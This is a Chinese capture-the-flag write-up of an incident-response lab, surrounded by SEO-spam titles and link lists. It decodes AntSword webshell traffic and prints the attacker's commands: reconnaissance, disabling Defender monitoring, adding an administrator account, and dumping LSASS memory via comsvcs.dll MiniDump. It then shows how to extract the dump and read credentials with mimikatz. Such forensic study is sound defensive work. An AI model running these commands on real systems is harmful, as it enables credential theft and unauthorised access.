当前位置: 首页 > wzjs >正文

如何利用视频网站做推广福州百度快速优化排名

如何利用视频网站做推广,福州百度快速优化排名,手游源码平台,西安效果图制作目录 一、测试环境 二、测试目的 三、操作过程 Flag1 Flag2 Flag3 四、结论 一、测试环境 靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。 地址:https://xj.edisec.net/challenges/44 靶机简介: 二、测试目的 …

目录

一、测试环境

二、测试目的

三、操作过程

Flag1

Flag2

Flag3

四、结论


一、测试环境

靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。

地址:https://xj.edisec.net/challenges/44

靶机简介:

二、测试目的

对附件数据包进行流量分析,按照题目要求找出对应的flag并提交。

三、操作过程

Flag1

进行流量分析,过滤http流量,发现product2.php是webshell流量

蚁剑使用的是base64加密,其中密文前两位是混淆字符,需要将每个包的命令执行语句进行解码,分析命令,找寻线索

所有命令解码如下:

C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /priv&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&systeminfo&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net view&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net share&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”© store.php c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

C:/Temp/OnlineShopBack.zip

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:\windows\system32&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\windows\config&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /all&echo [S]&cd&echo [E]

在length为4146的webshell流量包中,解码得到了创建admin账户的命令

解码得到密码:Password1

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

Flag1:flag{Password1}

Flag2

在length为4172的webshell流量包中,解码得到了LSASS.exe的程序进程id,这也是命令中唯一的id号

rundll32.exe 可用于执行 DLL 文件,也能调用该文件中的内部函数,这里就调用了comsvcs.dll中的MiniDump函数。

Comsvcs.dll的minidump函数可以创建内存转储文件,包含了系统内存的快照,可能包含敏感信息,攻击者使用这个函数获取身份验证信息。

而LSASS.exe进程,负责本地安全策略以及用户身份验证。经常成为攻击者的目标。因此这条命令正是调用该进程的命令,进程id是852

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

Flag2:flag{852}

Flag3

根据对命令执行的分析,攻击者导出身份验证信息在文件:C:\temp\OnlineShopBackup.zip

可以将http流量包导出,分离出该文件。从最大的文件开始导出分析,导出为dmp文件

由于是蚁剑流量,文件头有多余字节,需要将文件头的e1c1709删除。删除后就是dmp文件的特征。(如果发现mimikatz没报错,也没读取成功,就重新导出,先保存为php文件,删除多余字符后保存为dmp文件试试)

 mimikatz的GitHub地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.ziphttps://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip 使用mimikatz识别dmp文件,需要注意:mimikatz管理员权限启动;mimikatz的版本是2022,不然也解密不出;

sekurlsa::minidump mima.dmp
sekurlsa::logonpasswords

成功读取信息,win101的NTML:282d975e35846022476068ab5a3d72df

解密得到用户win101的密码:admin#123

Flag3:flag{admin#123}

四、结论

流量分析的操作有时候很枯燥,但是不可或缺。需要耐心完成工作,确保不遗漏信息。

熟悉了获取主机身份信息的命令,以及mimikatz工具的使用方法。

http://www.dtcms.com/wzjs/33226.html

相关文章:

  • 企业网站建设的申请广州seo公司如何
  • 门户网下载前端seo搜索引擎优化
  • 做网站需要干什么兰州快速seo整站优化招商
  • 两个域名指向同一个网站怎么做百度一下app
  • 网站建设缴纳增值税税率百度推广后台登录入口官网
  • 昆明企业网站建设郑州百度推广托管
  • 龙华网站建设营销推广淄博做网站的公司
  • 网站建设添加音乐的代码google浏览器官网入口
  • 北京网站建设培训班南宁网站建设公司排行
  • 合肥设计网站谷歌查询关键词的工具叫什么
  • 建站加盟百度快速收录3元一条
  • 海口市住房和城乡建设局网站网站优化怎么操作
  • 招一个程序员可以做网站吗推广赚佣金的软件排名
  • 什么网站做hevc网络seo营销推广
  • 深圳做企业网站多少钱今日头条搜索优化怎么做
  • 深圳网站建设卓企求个没封的网站2022
  • 中国核工业建设集团公司企业网站排名优化公司
  • 泊头市做网站价格中视频自媒体平台注册
  • 国家疫情管理宁波seo在线优化方案公司
  • 微信营销平台哪个好北京seo优化外包
  • 福建百川建设有限公司网站新开传奇网站
  • 供求信息免费发布seo优化推广流程
  • 合肥专业做公司网站网络推广公司可不可靠
  • 学做快餐在哪个网站百度关键词搜索工具
  • 西安网站建设易网宣职业培训学校加盟
  • 温州网站制作系统武汉网优化seo公司
  • 网站从建设到上线流程图精准拓客软件哪个好
  • 如何建立网站视频企业全网推广
  • 现代建筑风格特点seo常用工具网站
  • 襄阳网站seo技巧网页设计是干嘛的